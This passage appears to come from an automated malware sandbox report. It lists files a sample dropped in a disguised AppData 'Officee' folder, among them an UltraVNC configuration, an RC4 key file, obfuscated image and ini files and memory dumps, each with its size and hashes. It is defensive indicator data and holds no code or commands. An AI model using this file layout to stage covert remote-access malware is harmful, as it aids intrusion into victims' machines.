6a28a3821b272c38f9a53b9d6b32395d9008c8f4

SHA256
d8a01f69840c07ace6ae33e2f76e832c22d4513c07e252b6730b6de51c2e4385

SHA512
78064b86076f79d9aa11f2ae0c8060e91643940182bc5241d226549eb798b0185709eb8e71d66a2b12542a7de65be4cb2493214873995dd1594582f04a689574

Download Submit
C:\Users\Admin\AppData\Roaming\Officee\RZ.pdf

Filesize
580KB

MD5
f66a9eb048fbc320dcc1bcb3c18320af

SHA1
8e8aaaa1aa318aee0c1cf4a7a8c1c87af1a132bf

SHA256
67b335a7abd286663aa28de60ac5e5417d99643e64c7d33e03ccea6ae826a334

SHA512
0cdd33b24eccd76c9ce906f51ba56c543d5e466d95ba01e921275812d488f788dc92d271f5d0d396385f46d71232fd3f80057f8c9141a5a6159ebbceea961b72

Download Submit
C:\Users\Admin\AppData\Roaming\Officee\UltraVNC.ini

Filesize
857B

MD5
a8b7229b55f865ec0c59ff0dcfe59e09

SHA1
8f0017b70fae57c72306d2cca88145762a9c91f1

SHA256
1e7728efa610aeeee579c5ba26abd438a6002690e593902af9c0d53ea36debf0

SHA512
c54550a477cf11ead92f93b48b3a77d75278e6f0212a89da794389802f6ae2cd08db56d3a1552251d439c45ea089642c8a601f132dbb836f6510a23212d5c287

Download Submit
C:\Users\Admin\AppData\Roaming\Officee\eldNdudDdNdadTdp.jpg

Filesize
62KB

MD5
0f06dc37619bd42fbb3d9646a2e94a1c

SHA1
60c9307ae050627d7ea3d21e46753fb43ddde230

SHA256
cbf6ae24da87b003b589ca5c1738f817b528c3c143154eeda8d02bdfc8291b1a

SHA512
6145c28cc072b7064cc352fff57d89efc244851128cd0df91399f26f9a0c05bde8d25b51e399e88aadb15b07a91e56333861088eadf7281c6a1c4a9e66f36773

Download Submit
C:\Users\Admin\AppData\Roaming\Officee\heKlKJK6K9KMKhK0.ini

Filesize
2.0MB

MD5
357743a202d5feb44f5de80d108e966e

SHA1
33732d4e77d852cfe3a763bb334c2944a81b2528

SHA256
91d6a11db693ca6975fa3d14a50a8868a30e97b99b52183af82c492c15e724e9

SHA512
f71dd208c93bd661db8fb8fcb93d3c2937276970f909ab6ede574ad3bbaeec8e67c309de5fde737b05dee9bc321826de4619b77ecdb41dd65f05f23891eaef90

Download Submit
C:\Users\Admin\AppData\Roaming\Officee\isr9rfrXrWr1r8rU.jpg

Filesize
142KB

MD5
ea646e527a3752a278e361e21874b033

SHA1
d888140c17d540281bfca934b1e1967f23318d60

SHA256
1fc977f7e2ed8103004a748c091c94c21a16a8b8df04160778375927ea5604db

SHA512
7de1098bf3d2dafdd0fe70edacc36ef36c5f4ba34bca63cc0eea2b3001ed4477a0802947eea507316eb8852bdc94dfb1e0c30005dc90ec456a5cb141fd78c3f4

Download Submit
C:\Users\Admin\AppData\Roaming\Officee\rc4.key

Filesize
87B

MD5
3a3bbdf24fb500bbd12dfe94ba84a007

SHA1
87f480995a2e1269878910c7697d602fc306625b

SHA256
3225058afbdf79b87d39a3be884291d7ba4ed6ec93d1c2010399e11962106d5b

SHA512
e6307dd02d104248c2d54132a6a509eb09d2e1bc722a57127d350dde8171a715b0a123ad28c8c44aa466e9e71e49fbcb8a13160ae2b58c3dba511968afae1c21

Download Submit
C:\Users\Admin\AppData\Roaming\Officee\xmzXzvzuz7zbzlzc.jpg

Filesize
147KB

MD5
07c7bdea1b6e350dd577cd86e10de495

SHA1
108e74f73bbe097ab24101f74d7d41123de672ae

SHA256
1f1c3450754eae8bfb94f37268fce7a9584d07a30052d4c528a509dfc84eda22

SHA512
dfc036e3b20ed9cc2df5b4ace5238473a305ce0ae9f930b35a4267da8eb221c969ed29e545b7c51464322d141a08771e2b6161a0462a65057d2fc77bfb8d96cd

Download Submit
memory/2392-171-0x000000000AF30000-0x000000000B07D000-memory.dmp

Filesize
1.3MB

Download
memory/2392-172-0x000000000AF30000-0x000000000B1DB000-memory.dmp

Filesize
2.7MB

Download